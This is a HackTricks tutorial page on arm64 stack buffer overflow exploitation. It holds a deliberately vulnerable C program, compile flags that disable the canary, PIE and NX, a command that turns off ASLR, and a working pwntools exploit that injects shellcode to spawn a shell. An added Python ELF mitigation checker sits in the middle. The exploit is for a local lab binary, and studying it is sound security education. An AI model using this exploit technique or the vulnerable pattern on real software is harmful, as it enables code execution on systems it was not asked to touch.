Stack Shellcode - arm64

Support HackTricks

Get an introduction to arm64 in:

Introduction to ARM64v8

Code

#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
    char buffer[64];
    read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
    vulnerable_function();
    return 0;
}

Compile without PIE, canary and NX:

clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
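To confirm what those flags actually produced in the binary (or, on a real system, to confirm a deployed binary does not lack these mitigations), here is an added checker that is not part of the HackTricks page: it reads the ELF64 header and program headers the way checksec does, deriving NX from the PT_GNU_STACK flags, PIE from the ELF type, and the canary from the imported __stack_chk_fail symbol. The build_sample_elf helper constructs a minimal stand-in image so the check runs offline; it is an assumption for the demo, not the compiled bof binary.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header describing stack permissions
PF_X = 0x1                  # executable bit in p_flags
ET_EXEC, ET_DYN = 2, 3      # fixed-address executable vs. position-independent (PIE)
EM_AARCH64 = 183            # e_machine value for arm64

def check_protections(data: bytes) -> dict:
    """Report NX / PIE / stack-canary status from a raw ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2:        # EI_CLASS 2 = 64-bit
        raise ValueError("not an ELF64 image")
    e_type, = struct.unpack_from("<H", data, 16)
    e_phoff, = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    # "-z execstack" sets PF_X on PT_GNU_STACK; a missing PT_GNU_STACK also
    # leaves the loader free to map an executable stack, so treat it as not NX.
    nx = False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {
        "nx": nx,
        "pie": e_type == ET_DYN,                        # -no-pie gives ET_EXEC
        "canary": b"__stack_chk_fail" in data,          # absent with -fno-stack-protector
    }

def build_sample_elf(pie: bool, nx: bool, canary: bool) -> bytes:
    """Constructed stand-in: a minimal ELF64/aarch64 image with one PT_GNU_STACK
    program header. It is not loadable; it only exercises the checker."""
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # 64-bit, LE, SysV ABI
    ehdr += struct.pack("<HHIQQQIHHHHHH",
                        ET_DYN if pie else ET_EXEC, EM_AARCH64, 1,
                        0x400000, 64, 0, 0,      # e_entry, e_phoff, e_shoff, e_flags
                        64, 56, 1, 64, 0, 0)     # ehsize, phentsize, phnum, shentsize, shnum, shstrndx
    flags = 0x6 | (0 if nx else PF_X)            # PF_R|PF_W, plus PF_X for an exec stack
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, flags, 0, 0, 0, 0, 0, 0x10)
    tail = b"__stack_chk_fail\x00" if canary else b""
    return ehdr + phdr + tail

if __name__ == "__main__":
    print(check_protections(build_sample_elf(pie=False, nx=False, canary=False)))
```

Running it against the page's build flags is the equivalent of `checksec --file=./bof`; every field reported False is a mitigation the binary is missing.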

No ASLR & No canary - Stack Overflow

To disable ASLR run:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

To find the offset of the bof check this link.

Exploit:

from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

The only "difficult" thing to find here would be the address in the stack to jump to. In my case I generated the exploit with the address found using gdb, but then when exploiting it didn't work (because the stack address changed a bit).

I opened the generated core file (gdb ./bof ./core) and checked the real address of the start of the shellcode.
